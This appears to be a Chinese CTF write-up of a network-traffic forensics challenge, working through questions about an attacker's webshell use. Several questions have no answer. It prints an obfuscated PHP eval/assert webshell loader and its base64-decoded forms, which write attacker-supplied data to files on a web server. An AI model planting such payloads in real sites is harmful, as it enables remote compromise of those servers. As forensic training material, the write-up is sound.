重做了一下，以前杂项只专注做过密码与隐写，在铁三上就等着GG

0x01 网站后台密码是多少? 打开第二个数据包

passwd:aabbcc

0x02 攻击者IP是多少？ 由上图得出为202.1.1.2

0x03 网站后台登陆地址是多少（http://+IP+路径）？

0x04 后台写入的Webshell内容是什么？

0x05 网站数据库密码是多少？

0x06 黑客第一个上传的php文件名是什么？

array_map("ass"."ert",array("ev"."Al("\$xx=\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9Jy92YXIvd3d3L2h0bWwvZGl5cGFnZS9zY2FuLnBocCc7JGM9JF9QT1NUWyJ6MSJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoJyUnLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCd3JyksJGJ1Zik/JzEnOicwJyk7O2VjaG8oIlhAWSIpO2RpZSgpOw=='));");"));

base64解码

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/diypage/scan.php';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();

0x07 黑客对内网扫描的范围是多少(ip1-ip2)？

0x08 .黑客下载的数据库备份文件名是什么？

导出http对象，得到：

0x09 黑客上传的图片木马的密码是多少？

0x0A 黑客修改了哪个文件来配合木马文件(绝对路径)？

base64转码：@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='/var/www/html/diypage/favicon.ico';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();

0x0B FTP服务器开在了哪个端口？